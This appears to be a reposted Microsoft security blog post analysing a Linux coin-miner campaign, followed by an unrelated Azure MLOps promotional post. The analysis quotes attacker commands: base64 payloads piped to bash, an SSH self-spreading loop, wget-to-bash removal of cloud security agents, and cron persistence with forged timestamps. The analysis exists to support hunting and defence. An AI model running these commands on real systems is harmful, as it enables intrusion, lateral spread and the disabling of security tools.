This attack is interesting for several reasons. The attacker echoes in their scripts so we can see what they want to do, not just what executes on the machine. The scripts cover a wide range of possible services to exploit so they demonstrate how far the campaign can reach. Finally, because we have the scripts themselves, we can pull out good examples from the Lateral Movement, Defense Evasion, Persistence, and Objectives sections of the Linux MITRE ATT&CK Matrix and use those to talk about hunting on your own data.

Initial vector


For this attack, the first indication something is wrong in the audited logs is an echo command piping a base64 encoded command into base64 for decoding then piping into bash. Across our users, this first command has a parent process of an application or service exposed to the internet and the command is run by the user account associated with that process. This indicates the application or service itself was exploited in order to run the commands. While some of these accounts are specific to a customer, we also see common accounts like Ubuntu, Jenkins, and Hadoop being used.

/bin/sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYm

luOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K<snip>CmRvbm

UK|base64 -d|bash"

Scripts


It is worth taking a brief aside to talk about how this attacker uses scripts. In this case, they do nearly everything through base64 encoded scripts. One of the interesting things about those scripts is they start with the same first two lines: redirecting both the standard error and standard output stream to /dev/null and setting the path variable to locations the attacker knows generally hold the system commands they want to run.

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

This indicates that when each of them is base64 encoded, the first part of the encoding is the same every time.

ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYm

luOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K

The use of the same command is particularly helpful when trying to tie attacks together across a large set of machines. The scripts themselves are also interesting because we can see what the attacker intended to run. As defenders, it can be very valuable to look at attacker scripts whenever you can so you can see how they are trying to manipulate systems. For instance, this attacker uses a for loop to cycle through different possible domain names. This type of insight gives defenders more data to pivot on during an investigation.

for h in onion.glass civiclink.network tor2web.io onion.sh onion.mn onion.in.net onion.to
do
if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then
x t<snip>v.$h
else
break
fi
done

We observed this attacker use over thirty different encoded scripts across a number of customers, but they boiled down to roughly a dozen basic scripts with small differences in executable names or download sites. Within those scripts are some interesting examples that we can tie directly to the MITRE ATT&CK Matrix for Linux.

Lateral Movement


While it isn’t the first thing the attacker does, they do use an interesting combination Discovery (T1018: Remote System Discovery) and Lateral Movement (T1021: Remote Services) techniques to infect other hosts. They grep through the files .bash_history, /etc/hosts, and .ssh/known_hosts looking for IP addresses. They then attempt to pass their initial encoded script into each host using both the root account and the account they compromised on their current host without a password. Note, the xssh function appears before the call in the original script.

hosts=$(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |awk -F: {'print $2'}|sort|uniq ;awk {'print $1'} $HOME/.ssh/known_hosts|sort|uniq|grep -v =|sort|uniq)
for h in $hosts;do xssh root $h; xssh $USER $h & done
------
xssh() {
ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no $1@$2 'echo ZXhlYyA<snip>KZG9uZQo=|base64 -d|bash'
}

In each case, after the initial foothold is gained, the attacker uses a similar set of Defense Evasion techniques.

Defense Evasion


Over various scripts, the attacker uses the T1107: File Deletion, T1222: File and Directory Permissions Modification, and T1089: Disabling Security Tools techniques, as well as the obvious by this point, T1064: Scripting.

In one script they first they make a randomly named file:

z=./$(date|md5sum|cut -f1 -d" ")

After they download their executable into that file, they modify the downloaded file for execution, run it, then delete the file from disk:

chmod +x $z;$z;rm -f

In another script, the attacker tries to download then run uninstall files for the Alibaba Cloud Security Server Guard and the AliCloud CloudMonitor service (the variable $w is set as a wget command earlier in the script).

$w update.aegis.aliyun.com/download/uninstall.sh|bash
$w update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
/usr/local/qcloud/stargate/admin/uninstall.sh

Persistence


Once the coin miner is up and running, this attacker uses a combination of T1168: Local Job Scheduling and T1501: Systemd Service scheduled tasks for persistence. The below is taken from another part of a script where they echo an ntp call and one of their base64 encoded scripts into the file systemd-ntpdate then add a cron job to run that file. The encoded script here is basically the same as their original script that started off the intrusion.

echo -e "#\x21/bin/bash\nexec &>/dev/null\nntpdate ntp.aliyun.com\nsleep $((RANDOM % 600))\necho ZXhlYyAmPi9<snip>2gKZmkK|base64 -d|bash" > /lib/systemd/systemd-ntpdate
echo "0 * * * * root /lib/systemd/systemd-ntpdate" > /etc/cron.d/0systemd-ntpdate
touch -r /bin/grep /lib/systemd/systemd-ntpdate
touch -r /bin/grep /etc/cron.d/0systemd-ntpdate
chmod +x /lib/systemd/systemd-ntpdate

Objectives


As previously mentioned, the main objective of this attacker is to get a coin miner started. They do this in the very first script that is run using the T1496: Resource Hijacking tactic. One of the interesting things about this attack is that while they start by trying to get the coin miner going with the initially compromised account, one of the subsequent scripts attempts to get it started using commands from different pieces of software (T1072: Third-party Software).

ansible all -m shell -a 'echo ZXh<snip>uZQo=|base64 -d|bash'
knife ssh 'name:*' 'echo ZXh<snip>uZQo=|base64 -d|bash'
salt '*' cmd.run 'echo ZXh<snip>ZQo=|base64 -d|bash'

Hunting


ASC Linux customers should expect to see coin mining or suspicious download alerts from this type of activity, but what if you wanted to hunt for it yourself? If you use the above script examples, there are several indicators you could follow up on, especially if you have command line logging.

◉ Do you see unexpected connections to onion and tor sites?

◉ Do you see unexpected ssh connections between hosts?

◉ Do you see an increase in activity from a particular user?

◉ Do you see base64 commands echoed, decoded, then piped into bash? Any one of those could be suspicious depending on your own network.

◉ Check your cron jobs, do you see wgets or base64 encoded lines there?

◉ Check the services running on your machines, do you see anything unexpected?

◉ In reference to the Objectives section above, do you see commands for pieces of software you don’t have installed?

Azure Sentinel can help with your hunting as well. If you are an Azure Security Center customer already, we make it easy to integrate into Azure Sentinel.

Defense


Azure Study Materials, Azure Guides, Azure Certifications, Azure Online Exam, Azure Tutorial and Material
In addition to hunting, there are a few things you can do to defend yourself from these types of attacks. If you have internet-facing services, make sure you are keeping them up to date, are changing any default passwords, and taking advantage of some of the other credential management tools Azure offers like just-in-time (JIT), password-less sign-in, and Azure Key Vault. Monitor your Azure machine utilization rates; an unexpected increase in usage could indicate a coin miner.

Identifying attacks on Linux systems


Coin miners represent a continuing threat to machines exposed to the internet. While it's generally easy to block a known-bad IP or use a signature-based antivirus, by studying attacker tactics, techniques, and procedures, defenders can find new and more reliable ways to protect their environments.

While we talk about a specific coin miner attacker in this post, the basic techniques highlighted above are used by many different types of attackers of Linux systems. We see Lateral movement, Defense Evasion, and Persistence techniques similar to the above used by different attackers regularly and are continually adding new detections based on our investigations.

Wednesday, 22 January 2020

MLOps—the path to building a competitive edge

Enterprises today are transforming their businesses using Machine Learning (ML) to develop a lasting competitive advantage. From healthcare to transportation, supply chain to risk management, machine learning is becoming pervasive across industries, disrupting markets and reshaping business models.

Organizations need the technology and tools required to build and deploy successful Machine Learning models and operate in an agile way. MLOps is the key to making machine learning projects successful at scale. What is MLOps ? It is the practice of collaboration between data science and IT teams designed to accelerate the entire machine lifecycle across model development, deployment, monitoring, and more. Microsoft Azure Machine Learning enables companies to fully embrace MLOps practices will and truly be able to realize the potential of AI in their business.

One great example of a customer transforming their business with Machine Learning and MLOps is TransLink. They support Metro Vancouver's transportation network, serving 400 million total boarding’s from residents and visitors as of 2018. With an extensive bus system spanning 1,800 sq. kilometers, TransLink customers depend heavily on accurate bus departure times to plan their journeys.

To enhance customer experience, TransLink deployed 18,000 different sets of Machine Learning models to better predict bus departure times that incorporate factors like traffic, bad weather, and other schedule disruptions. Using MLOps with Azure Machine Learning they were able to manage and deliver the models at scale.

“With MLOps in Azure Machine Learning, TransLink has moved all models to production and improved predictions by 74 percent, so customers can better plan their journey on TransLink's network. This has resulted in a 50 percent reduction on average in customer wait times at stops.”–Sze-Wan Ng, Director of Analytics & Development, TransLink.

Johnson Controls is another customer using Machine Learning Operations at scale. For over 130 years, they have produced fire, HVAC and security equipment for buildings. Johnson Controls is now in the middle of a smart city revolution, with Machine Learning being a central aspect of their equipment maintenance approach.

Johnson Controls runs thousands of chillers with 70 different types of sensors each, streaming terabytes of data. MLOps helped put models into production in a timely fashion, with a repeatable process, to deliver real-time insights on maintenance routines. As a result, chiller shutdowns could be predicted days in advance and mitigated effectively, delivering cost savings and increasing customer satisfaction.

“Using the MLOps capabilities in Azure Machine Learning, we were able to decrease both mean time to repair and unplanned downtime by over 66 percent, resulting in substantial business gains.”–Vijaya Sekhar Chennupati, Applied Data Scientist at Johnson Controls

Getting started with MLOps


To take full advantage of MLOps, organizations need to apply the same rigor and processes of other software development projects.

To help organizations with their machine learning journey, GigaOm developed the MLOps vision report that includes best practices for effective implementation and a maturity model.

Maturity is measured through five levels of development across key categories such as strategy, architecture, modeling, processes, and governance. Using the maturity model, enterprises can understand where they are and determine what steps to take to ‘level up’ and achieve business objectives.

Microsoft Tutorials and Materials, Microsoft Online Exam, Azure Study Materials, Azure Guides

“Organizations can address the challenges of developing AI solutions by applying MLOps and implementing best practices. The report and MLOps maturity model from GigaOm can be a very valuable tool in this journey,”– Vijaya Sekhar Chennupati, Applied Data Scientist at Johnson Controls.

Source: microsoft.com